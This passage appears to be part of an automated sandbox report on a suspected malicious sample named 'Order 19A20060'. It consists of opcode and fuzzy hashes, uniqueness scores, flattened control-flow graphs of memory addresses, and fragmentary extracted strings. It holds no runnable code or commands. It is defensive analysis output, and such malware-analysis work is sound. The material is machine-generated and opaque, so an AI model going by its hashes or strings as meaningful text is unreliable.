                                                                              • Opcode ID: 59a3d416659106ebfaa7a59ab070bc8781c9b9317cc8780b3a0f128f57b2fe37
                                                                              • Instruction ID: 93f78cd95eab0f3740de27005401d7ff7670b7e399b2a9f88a8edc3c6d0e1b75
                                                                              • Opcode Fuzzy Hash: 59a3d416659106ebfaa7a59ab070bc8781c9b9317cc8780b3a0f128f57b2fe37
                                                                              • Instruction Fuzzy Hash: D6323F31E1061A8FCB54EF75D95459DB7B6FFC9300F2486A9D409AB224EF30E986CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1091 6a47d90-6a47dae 1092 6a47db0-6a47db3 1091->1092 1093 6a47dd4-6a47dd7 1092->1093 1094 6a47db5-6a47dcf 1092->1094 1095 6a47dd9-6a47df5 1093->1095 1096 6a47dfa-6a47dfd 1093->1096 1094->1093 1095->1096 1097 6a47e14-6a47e17 1096->1097 1098 6a47dff-6a47e0d 1096->1098 1100 6a47e24-6a47e26 1097->1100 1101 6a47e19-6a47e23 1097->1101 1107 6a47e36-6a47e4c 1098->1107 1108 6a47e0f 1098->1108 1104 6a47e2d-6a47e30 1100->1104 1105 6a47e28 1100->1105 1104->1092 1104->1107 1105->1104 1111 6a48067-6a48071 1107->1111 1112 6a47e52-6a47e5b 1107->1112 1108->1097 1113 6a47e61-6a47e7e 1112->1113 1114 6a48072-6a480a7 1112->1114 1121 6a48054-6a48061 1113->1121 1122 6a47e84-6a47eac 1113->1122 1117 6a480a9-6a480ac 1114->1117 1119 6a480ae-6a480ca 1117->1119 1120 6a480cf-6a480d2 1117->1120 1119->1120 1123 6a4817f-6a48182 1120->1123 1124 6a480d8-6a480e4 1120->1124 1121->1111 1121->1112 1122->1121 1145 6a47eb2-6a47ebb 1122->1145 1125 6a483b7-6a483b9 1123->1125 1126 6a48188-6a48197 1123->1126 1131 6a480ef-6a480f1 1124->1131 1129 6a483c0-6a483c3 1125->1129 1130 6a483bb 1125->1130 1141 6a481b6-6a481fa 1126->1141 1142 6a48199-6a481b4 1126->1142 1129->1117 1133 6a483c9-6a483d2 1129->1133 1130->1129 1135 6a480f3-6a480f9 1131->1135 1136 6a48109-6a4810d 1131->1136 1137 6a480fd-6a480ff 1135->1137 1138 6a480fb 1135->1138 1139 6a4810f-6a48119 1136->1139 1140 6a4811b 1136->1140 1137->1136 1138->1136 1144 6a48120-6a48122 1139->1144 1140->1144 1151 6a48200-6a48211 1141->1151 1152 6a4838b-6a483a1 1141->1152 1142->1141 1146 6a48124-6a48127 1144->1146 1147 6a48139-6a48172 1144->1147 1145->1114 1149 6a47ec1-6a47edd 1145->1149 1146->1133 1147->1126 1171 6a48174-6a4817e 1147->1171 1158 6a48042-6a4804e 1149->1158 1159 6a47ee3-6a47f0d 1149->1159 1160 6a48376-6a48385 1151->1160 1161 6a48217-6a48234 1151->1161 1152->1125 1158->1121 1158->1145 1174 6a47f13-6a47f3b 1159->1174 1175 6a48038-6a4803d 1159->1175 1160->1151 1160->1152 1161->1160 1173 6a4823a-6a48330 call 6a46598 1161->1173 1224 6a48332-6a4833c 1173->1224 1225 6a4833e 1173->1225 1174->1175 1181 6a47f41-6a47f6f 1174->1181 1175->1158 1181->1175 1187 6a47f75-6a47f7e 1181->1187 1187->1175 1189 6a47f84-6a47fb6 1187->1189 1196 6a47fc1-6a47fdd 1189->1196 1197 6a47fb8-6a47fbc 1189->1197 1196->1158 1199 6a47fdf-6a48036 call 6a46598 1196->1199 1197->1175 1198 6a47fbe 1197->1198 1198->1196 1199->1158 1226 6a48343-6a48345 1224->1226 1225->1226 1226->1160 1227 6a48347-6a4834c 1226->1227 1228 6a4834e-6a48358 1227->1228 1229 6a4835a 1227->1229 1230 6a4835f-6a48361 1228->1230 1229->1230 1230->1160 1231 6a48363-6a4836f 1230->1231 1231->1160
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q
                                                                              • API String ID: 0-355816377
                                                                              • Opcode ID: 588af03f3748fb74898e6ee9a62e2fd2555a4a31a829cb2e346320ae50e66de2
                                                                              • Instruction ID: 531be711aa3239a621aa9ac0c59158174244dfe69adb7d037889f4d14610f846
                                                                              • Opcode Fuzzy Hash: 588af03f3748fb74898e6ee9a62e2fd2555a4a31a829cb2e346320ae50e66de2
                                                                              • Instruction Fuzzy Hash: C5029B30B002159FDB54EB69E990AAEB7E2FFC4300F148569D40ADB395DB35EC86CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 6f77f9ac5685d897eaa3018036ef55028b381545ec6aab156a389c484e6e7326
                                                                              • Instruction ID: db062929dd1920ac20e0b0ecf08a3289d5f36ca6d1b4da3473aa0c2784a3fd4e
                                                                              • Opcode Fuzzy Hash: 6f77f9ac5685d897eaa3018036ef55028b381545ec6aab156a389c484e6e7326
                                                                              • Instruction Fuzzy Hash: 68924634A002048FDB64EB68C984B6DB7F2FF84314F5585A9E849AF365DB35ED85CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d82ce255bbd5748401cd9aeabd2d6f4fa1a25cddf83a28d314ad73890d527e59
                                                                              • Instruction ID: 8bca084b78f9b8df7e197df9ee84b4f4735e8f151369c350c254be049155df5c
                                                                              • Opcode Fuzzy Hash: d82ce255bbd5748401cd9aeabd2d6f4fa1a25cddf83a28d314ad73890d527e59
                                                                              • Instruction Fuzzy Hash: F862AB34A002058FDB54FB68D984AADB7F2EFC9314F249569E41ADB395DB31EC46CB80
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4fefa7693039a3982453c2d82a64425ed6a6f47df774b2816a404298f83becee
                                                                              • Instruction ID: 6bc041193d70146c280d4193a338cc02d8978bbd65b58361475f17aed74a9275
                                                                              • Opcode Fuzzy Hash: 4fefa7693039a3982453c2d82a64425ed6a6f47df774b2816a404298f83becee
                                                                              • Instruction Fuzzy Hash: 2422D035E102199FDF65EBA5C9806AEBBF2EF85310F248469D40AEF344DA31DC46CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e081dd2f20e4eba3d3eb8120382c7e73fddc7dbe37f15844e449ee110616c9c5
                                                                              • Instruction ID: 1730f5ebe683cf45a5cd5e6ddcf4a7a70d21a7fa4e72a02bf4d806d01326821b
                                                                              • Opcode Fuzzy Hash: e081dd2f20e4eba3d3eb8120382c7e73fddc7dbe37f15844e449ee110616c9c5
                                                                              • Instruction Fuzzy Hash: AC226030E101098BDF64FB6DD9907AEB7B6EBC5310F248925E409DF395DA35DC828BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-3823777903
                                                                              • Opcode ID: c4c2d6d4c603315c1c7f04dc2fa965680ab5521493bd0ed0f5fe4d721aab17b9
                                                                              • Instruction ID: 64d5a1d208c54ceee6e28fce885253f996679fea0b72259b677286a4aaeaea15
                                                                              • Opcode Fuzzy Hash: c4c2d6d4c603315c1c7f04dc2fa965680ab5521493bd0ed0f5fe4d721aab17b9
                                                                              • Instruction Fuzzy Hash: BBE19E30E0121A9FCB59EFA9D9806AEB7B2FFC5304F108929D5169B359DB30D846CB91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 549 6a4b660-6a4b682 550 6a4b684-6a4b687 549->550 551 6a4b6c5-6a4b6c8 550->551 552 6a4b689-6a4b69e 550->552 553 6a4b6ef-6a4b6f2 551->553 554 6a4b6ca-6a4b6ce 551->554 559 6a4b9fa-6a4ba2e 552->559 564 6a4b6a4-6a4b6c0 552->564 555 6a4b6f4-6a4b6fd 553->555 556 6a4b708-6a4b70b 553->556 558 6a4b6d4-6a4b6e4 554->558 554->559 560 6a4b703 555->560 561 6a4b95b-6a4b964 555->561 562 6a4b732-6a4b735 556->562 563 6a4b70d-6a4b711 556->563 571 6a4b9aa-6a4b9ae 558->571 572 6a4b6ea 558->572 573 6a4ba30-6a4ba33 559->573 560->556 561->559 568 6a4b96a-6a4b971 561->568 569 6a4b737-6a4b753 562->569 570 6a4b758-6a4b75b 562->570 563->559 567 6a4b717-6a4b727 563->567 564->551 594 6a4b7f2-6a4b7f5 567->594 595 6a4b72d 567->595 577 6a4b976-6a4b979 568->577 569->570 574 6a4b7bc-6a4b7bf 570->574 575 6a4b75d-6a4b7b7 call 6a46598 570->575 571->559 582 6a4b9b0-6a4b9c0 571->582 572->553 578 6a4ba35-6a4ba51 573->578 579 6a4ba56-6a4ba59 573->579 580 6a4b7c1-6a4b7c6 574->580 581 6a4b7c9-6a4b7cc 574->581 575->574 584 6a4b989-6a4b98c 577->584 585 6a4b97b-6a4b984 577->585 578->579 592 6a4bcc5-6a4bcc7 579->592 593 6a4ba5f-6a4ba87 579->593 580->581 589 6a4b7ce-6a4b7d4 581->589 590 6a4b7d9-6a4b7dc 581->590 582->563 608 6a4b9c6 582->608 587 6a4b9a5-6a4b9a8 584->587 588 6a4b98e-6a4b997 584->588 585->584 587->571 598 6a4b9cb-6a4b9ce 587->598 588->559 597 6a4b999-6a4b9a0 588->597 589->590 601 6a4b7ed-6a4b7f0 590->601 602 6a4b7de-6a4b7e8 590->602 604 6a4bcce-6a4bcd1 592->604 605 6a4bcc9 592->605 631 6a4ba91-6a4bad5 593->631 632 6a4ba89-6a4ba8c 593->632 606 6a4b7fa-6a4b7fd 594->606 595->562 597->587 598->594 609 6a4b9d4-6a4b9d7 598->609 601->594 601->606 602->601 604->573 610 6a4bcd7-6a4bce0 604->610 605->604 612 6a4b7ff-6a4b805 606->612 613 6a4b80a-6a4b80d 606->613 608->598 609->555 616 6a4b9dd-6a4b9df 609->616 612->613 617 6a4b80f-6a4b813 613->617 618 6a4b81a-6a4b81d 613->618 622 6a4b9e6-6a4b9e9 616->622 623 6a4b9e1 616->623 617->612 619 6a4b815 617->619 618->594 620 6a4b81f-6a4b822 618->620 619->618 620->594 625 6a4b824-6a4b827 620->625 622->550 626 6a4b9ef-6a4b9f9 622->626 623->622 627 6a4b83e-6a4b841 625->627 628 6a4b829-6a4b82d 625->628 634 6a4b863-6a4b866 627->634 635 6a4b843-6a4b85e 627->635 628->559 633 6a4b833-6a4b839 628->633 666 6a4bcba-6a4bcc4 631->666 667 6a4badb-6a4bae4 631->667 632->610 633->627 636 6a4b8c6-6a4b8cf 634->636 637 6a4b868-6a4b86b 634->637 635->634 636->588 641 6a4b8d5 636->641 642 6a4b86d-6a4b882 637->642 643 6a4b8aa-6a4b8ad 637->643 646 6a4b8da-6a4b8dd 641->646 642->559 654 6a4b888-6a4b8a5 642->654 644 6a4b8c1-6a4b8c4 643->644 645 6a4b8af-6a4b8b3 643->645 644->636 644->646 645->559 650 6a4b8b9-6a4b8bc 645->650 652 6a4b8ef-6a4b8f2 646->652 653 6a4b8df 646->653 650->644 656 6a4b8f4-6a4b8f8 652->656 657 6a4b909-6a4b90c 652->657 662 6a4b8e7-6a4b8ea 653->662 654->643 656->559 658 6a4b8fe-6a4b904 656->658 659 6a4b90e-6a4b914 657->659 660 6a4b919-6a4b91c 657->660 658->657 659->660 664 6a4b91e-6a4b924 660->664 665 6a4b929-6a4b92c 660->665 662->652 664->665 668 6a4b936-6a4b939 665->668 669 6a4b92e-6a4b933 665->669 670 6a4bcb0-6a4bcb5 667->670 671 6a4baea-6a4bb56 call 6a46598 667->671 672 6a4b943-6a4b946 668->672 673 6a4b93b-6a4b93e 668->673 669->668 670->666 683 6a4bc50-6a4bc65 671->683 684 6a4bb5c-6a4bb61 671->684 675 6a4b956-6a4b959 672->675 676 6a4b948-6a4b951 672->676 673->672 675->561 675->577 676->675 683->670 686 6a4bb63-6a4bb69 684->686 687 6a4bb7d 684->687 688 6a4bb6f-6a4bb71 686->688 689 6a4bb6b-6a4bb6d 686->689 690 6a4bb7f-6a4bb85 687->690 691 6a4bb7b 688->691 689->691 692 6a4bb87-6a4bb8d 690->692 693 6a4bb9a-6a4bba7 690->693 691->690 694 6a4bb93 692->694 695 6a4bc3b-6a4bc4a 692->695 699 6a4bbbf-6a4bbcc 693->699 700 6a4bba9-6a4bbaf 693->700 694->693 697 6a4bc02-6a4bc0f 694->697 698 6a4bbce-6a4bbdb 694->698 695->683 695->684 706 6a4bc27-6a4bc34 697->706 707 6a4bc11-6a4bc17 697->707 709 6a4bbf3-6a4bc00 698->709 710 6a4bbdd-6a4bbe3 698->710 699->695 702 6a4bbb1 700->702 703 6a4bbb3-6a4bbb5 700->703 702->699 703->699 706->695 711 6a4bc19 707->711 712 6a4bc1b-6a4bc1d 707->712 709->695 713 6a4bbe5 710->713 714 6a4bbe7-6a4bbe9 710->714 711->706 712->706 713->709 714->709
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2392861976
                                                                              • Opcode ID: 504983ecac4f032110680500a77218a5ed000d4058f6068b523f4799b104b735
                                                                              • Instruction ID: fd358f169d4f4de9d4978381a96e1257047c625a9eb51fe4af9e77987bbf01a8
                                                                              • Opcode Fuzzy Hash: 504983ecac4f032110680500a77218a5ed000d4058f6068b523f4799b104b735
                                                                              • Instruction Fuzzy Hash: 0F023C30E102098FDBA4FF69D9846ADB7B2FB85310F248566D409DF355DB31E886CBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 717 6a49160-6a49185 718 6a49187-6a4918a 717->718 719 6a49190-6a491a5 718->719 720 6a49a48-6a49a4b 718->720 726 6a491a7-6a491ad 719->726 727 6a491bd-6a491d3 719->727 721 6a49a71-6a49a73 720->721 722 6a49a4d-6a49a6c 720->722 723 6a49a75 721->723 724 6a49a7a-6a49a7d 721->724 722->721 723->724 724->718 729 6a49a83-6a49a8d 724->729 730 6a491b1-6a491b3 726->730 731 6a491af 726->731 734 6a491de-6a491e0 727->734 730->727 731->727 735 6a491e2-6a491e8 734->735 736 6a491f8-6a49269 734->736 737 6a491ec-6a491ee 735->737 738 6a491ea 735->738 747 6a49295-6a492b1 736->747 748 6a4926b-6a4928e 736->748 737->736 738->736 753 6a492b3-6a492d6 747->753 754 6a492dd-6a492f8 747->754 748->747 753->754 759 6a49323-6a4933e 754->759 760 6a492fa-6a4931c 754->760 765 6a49340-6a4935c 759->765 766 6a49363-6a49371 759->766 760->759 765->766 767 6a49381-6a493fb 766->767 768 6a49373-6a4937c 766->768 774 6a493fd-6a4941b 767->774 775 6a49448-6a4945d 767->775 768->729 779 6a49437-6a49446 774->779 780 6a4941d-6a4942c 774->780 775->720 779->774 779->775 780->779
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                              • API String ID: 0-2125118731
                                                                              • Opcode ID: 276f5af3961135ba54247129636ddf64a934f3a9c1f9726b73521873f14db3e5
                                                                              • Instruction ID: a09ffc3e1c0a4f964679f0fa8fe83ef9770c4787bbbe67677a37fe39f4f05a46
                                                                              • Opcode Fuzzy Hash: 276f5af3961135ba54247129636ddf64a934f3a9c1f9726b73521873f14db3e5
                                                                              • Instruction Fuzzy Hash: 77913034F0021A9FDB94EB65D8507AFB3F6AFC9244F108569C40AEB344EB70AD568B91
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 783 6a4cf48-6a4cf63 784 6a4cf65-6a4cf68 783->784 785 6a4cfb1-6a4cfb4 784->785 786 6a4cf6a-6a4cfac 784->786 787 6a4cfb6-6a4cfd2 785->787 788 6a4cfd7-6a4cfda 785->788 786->785 787->788 789 6a4d023-6a4d026 788->789 790 6a4cfdc-6a4cfeb 788->790 792 6a4d035-6a4d038 789->792 793 6a4d028-6a4d02a 789->793 795 6a4cfed-6a4cff2 790->795 796 6a4cffa-6a4d006 790->796 799 6a4d081-6a4d084 792->799 800 6a4d03a-6a4d07c 792->800 797 6a4d030 793->797 798 6a4d2ef-6a4d2f8 793->798 795->796 802 6a4d965-6a4d99e 796->802 803 6a4d00c-6a4d01e 796->803 797->792 804 6a4d307-6a4d313 798->804 805 6a4d2fa-6a4d2ff 798->805 806 6a4d086-6a4d0c8 799->806 807 6a4d0cd-6a4d0d0 799->807 800->799 820 6a4d9a0-6a4d9a3 802->820 803->789 810 6a4d424-6a4d429 804->810 811 6a4d319-6a4d32d 804->811 805->804 806->807 814 6a4d0d2-6a4d114 807->814 815 6a4d119-6a4d11c 807->815 835 6a4d431 810->835 811->835 836 6a4d333-6a4d345 811->836 814->815 818 6a4d165-6a4d168 815->818 819 6a4d11e-6a4d160 815->819 823 6a4d1b1-6a4d1b4 818->823 824 6a4d16a-6a4d1ac 818->824 819->818 827 6a4d9a5 call 6a4dabd 820->827 828 6a4d9b2-6a4d9b5 820->828 832 6a4d1b6-6a4d1bb 823->832 833 6a4d1be-6a4d1c1 823->833 824->823 841 6a4d9ab-6a4d9ad 827->841 830 6a4d9b7-6a4d9d3 828->830 831 6a4d9d8-6a4d9db 828->831 830->831 845 6a4d9dd-6a4da09 831->845 846 6a4da0e-6a4da10 831->846 832->833 843 6a4d1c3-6a4d1d9 833->843 844 6a4d1de-6a4d1e1 833->844 840 6a4d434-6a4d440 835->840 860 6a4d347-6a4d34d 836->860 861 6a4d369-6a4d36b 836->861 850 6a4d446-6a4d733 840->850 851 6a4d24a-6a4d259 840->851 841->828 843->844 855 6a4d1e3-6a4d225 844->855 856 6a4d22a-6a4d22d 844->856 845->846 853 6a4da17-6a4da1a 846->853 854 6a4da12 846->854 996 6a4d739-6a4d73f 850->996 997 6a4d95a-6a4d964 850->997 863 6a4d268-6a4d274 851->863 864 6a4d25b-6a4d260 851->864 853->820 867 6a4da1c-6a4da2b 853->867 854->853 855->856 858 6a4d23c-6a4d23f 856->858 859 6a4d22f-6a4d231 856->859 858->840 870 6a4d245-6a4d248 858->870 859->835 869 6a4d237 859->869 872 6a4d351-6a4d35d 860->872 873 6a4d34f 860->873 876 6a4d375-6a4d381 861->876 863->802 875 6a4d27a-6a4d28c 863->875 864->863 895 6a4da92-6a4daa7 867->895 896 6a4da2d-6a4da90 call 6a46598 867->896 869->858 870->851 880 6a4d291-6a4d294 870->880 881 6a4d35f-6a4d367 872->881 873->881 875->880 901 6a4d383-6a4d38d 876->901 902 6a4d38f 876->902 893 6a4d296-6a4d2d8 880->893 894 6a4d2dd-6a4d2df 880->894 881->876 893->894 904 6a4d2e6-6a4d2e9 894->904 905 6a4d2e1 894->905 914 6a4daa8 895->914 896->895 908 6a4d394-6a4d396 901->908 902->908 904->784 904->798 905->904 908->835 915 6a4d39c-6a4d3b8 call 6a46598 908->915 914->914 929 6a4d3c7-6a4d3d3 915->929 930 6a4d3ba-6a4d3bf 915->930 929->810 932 6a4d3d5-6a4d422 929->932 930->929 932->835 998 6a4d741-6a4d746 996->998 999 6a4d74e-6a4d757 996->999 998->999 999->802 1000 6a4d75d-6a4d770 999->1000 1002 6a4d776-6a4d77c 1000->1002 1003 6a4d94a-6a4d954 1000->1003 1004 6a4d77e-6a4d783 1002->1004 1005 6a4d78b-6a4d794 1002->1005 1003->996 1003->997 1004->1005 1005->802 1006 6a4d79a-6a4d7bb 1005->1006 1009 6a4d7bd-6a4d7c2 1006->1009 1010 6a4d7ca-6a4d7d3 1006->1010 1009->1010 1010->802 1011 6a4d7d9-6a4d7f6 1010->1011 1011->1003 1014 6a4d7fc-6a4d802 1011->1014 1014->802 1015 6a4d808-6a4d821 1014->1015 1017 6a4d827-6a4d84e 1015->1017 1018 6a4d93d-6a4d944 1015->1018 1017->802 1021 6a4d854-6a4d85e 1017->1021 1018->1003 1018->1014 1021->802 1022 6a4d864-6a4d87b 1021->1022 1024 6a4d87d-6a4d888 1022->1024 1025 6a4d88a-6a4d8a5 1022->1025 1024->1025 1025->1018 1030 6a4d8ab-6a4d8c4 call 6a46598 1025->1030 1034 6a4d8c6-6a4d8cb 1030->1034 1035 6a4d8d3-6a4d8dc 1030->1035 1034->1035 1035->802 1036 6a4d8e2-6a4d936 1035->1036 1036->1018
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: $^q$$^q$$^q
                                                                              • API String ID: 0-831282457
                                                                              • Opcode ID: d7687e696433138da8fe46f26433ebc4a6d024e24f7d233447dcb20e7b1563df
                                                                              • Instruction ID: 01f643cafb0e77b73af868d0a0d7792ab93f115a35a6ad444107ed0b53d8a568
                                                                              • Opcode Fuzzy Hash: d7687e696433138da8fe46f26433ebc4a6d024e24f7d233447dcb20e7b1563df
                                                                              • Instruction Fuzzy Hash: 2E625230A0021A8FCB55FB69D990A5DB7F2FF84344F208A69D4099F359DB71ED4ACB90
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1044 6a44b70-6a44b94 1045 6a44b96-6a44b99 1044->1045 1046 6a44bba-6a44bbd 1045->1046 1047 6a44b9b-6a44bb5 1045->1047 1048 6a44bc3-6a44cbb 1046->1048 1049 6a4529c-6a4529e 1046->1049 1047->1046 1067 6a44cc1-6a44d0e call 6a45418 1048->1067 1068 6a44d3e-6a44d45 1048->1068 1051 6a452a5-6a452a8 1049->1051 1052 6a452a0 1049->1052 1051->1045 1054 6a452ae-6a452bb 1051->1054 1052->1051 1081 6a44d14-6a44d30 1067->1081 1069 6a44dc9-6a44dd2 1068->1069 1070 6a44d4b-6a44dbb 1068->1070 1069->1054 1087 6a44dc6 1070->1087 1088 6a44dbd 1070->1088 1085 6a44d32 1081->1085 1086 6a44d3b-6a44d3c 1081->1086 1085->1086 1086->1068 1087->1069 1088->1087
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: fcq$XPcq$\Ocq
                                                                              • API String ID: 0-3575482020
                                                                              • Opcode ID: 607fdb5deb427059a9a3279faddf679ac3e89732a4aea907181472dde6d68781
                                                                              • Instruction ID: 16f529a66ca3eb5f3d829c05103d15ebf9c00594ed2bcee1fde33a05c18bec2b
                                                                              • Opcode Fuzzy Hash: 607fdb5deb427059a9a3279faddf679ac3e89732a4aea907181472dde6d68781
                                                                              • Instruction Fuzzy Hash: 12617F30F102199FEB55EFA5D8547AEBBF2FBC8340F20852AD506EB394DA718C458B51
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1470 6a4a3b8-6a4a3b9 1471 6a4a357-6a4a35a 1470->1471 1472 6a4a3bb-6a4a3c1 1470->1472 1473 6a4a35f-6a4a36e 1471->1473 1472->1473 1474 6a4a3c3-6a4a3e8 1472->1474 1481 6a4a375 1473->1481 1475 6a4a3ea-6a4a3ed 1474->1475 1477 6a4a3ef-6a4a3f9 1475->1477 1478 6a4a3fa-6a4a3fd 1475->1478 1479 6a4a403-6a4a430 call 6a42058 1478->1479 1480 6a4a52e-6a4a531 1478->1480 1519 6a4a436-6a4a45b 1479->1519 1520 6a4a523-6a4a52d 1479->1520 1482 6a4a533-6a4a541 1480->1482 1483 6a4a548-6a4a54b 1480->1483 1486 6a4a37a-6a4a37d 1481->1486 1488 6a4a577-6a4a5fc 1482->1488 1498 6a4a543 1482->1498 1484 6a4a54d-6a4a569 1483->1484 1485 6a4a56e-6a4a571 1483->1485 1484->1485 1485->1488 1489 6a4a61e-6a4a621 1485->1489 1490 6a4a39f-6a4a3a1 1486->1490 1491 6a4a37f-6a4a39a 1486->1491 1531 6a4a603-6a4a60d 1488->1531 1532 6a4a5fe call 6a42058 1488->1532 1496 6a4a641-6a4a643 1489->1496 1497 6a4a623-6a4a63c 1489->1497 1494 6a4a3a3 1490->1494 1495 6a4a3a8-6a4a3ab 1490->1495 1491->1490 1494->1495 1500 6a4a330-6a4a333 1495->1500 1501 6a4a3ad-6a4a3b1 1495->1501 1503 6a4a645 1496->1503 1504 6a4a64a-6a4a64d 1496->1504 1497->1496 1498->1483 1508 6a4a355-6a4a358 1500->1508 1509 6a4a335-6a4a350 1500->1509 1503->1504 1504->1475 1511 6a4a653-6a4a65c 1504->1511 1508->1486 1515 6a4a35a 1508->1515 1509->1508 1522 6a4a366-6a4a36e 1515->1522 1529 6a4a465 1519->1529 1530 6a4a45d-6a4a463 1519->1530 1522->1481 1533 6a4a46b-6a4a51d call 6a46598 call 6a42058 1529->1533 1530->1533 1531->1479 1534 6a4a613-6a4a61d 1531->1534 1532->1531 1533->1519 1533->1520
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.4109919696.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_8_2_6a40000_Order 19A20060.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: X!@$x!@
                                                                              • API String ID: 0-2527372166
                                                                              • Opcode ID: e5b91e88333bc258f87926668cc4cbf0fda5db1b305b35dcfa06acb3d5b30e40
                                                                              • Instruction ID: a2eb074ea4009675b852db1dfd6ca26ea9088702df472f6513544c4b17dd8ebc
                                                                              • Opcode Fuzzy Hash: e5b91e88333bc258f87926668cc4cbf0fda5db1b305b35dcfa06acb3d5b30e40
                                                                              • Instruction Fuzzy Hash: A0819231B112159FCB54FBA8E9906ADB7B2EBC8310F108529E50AEB354EB31DD46CB81
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
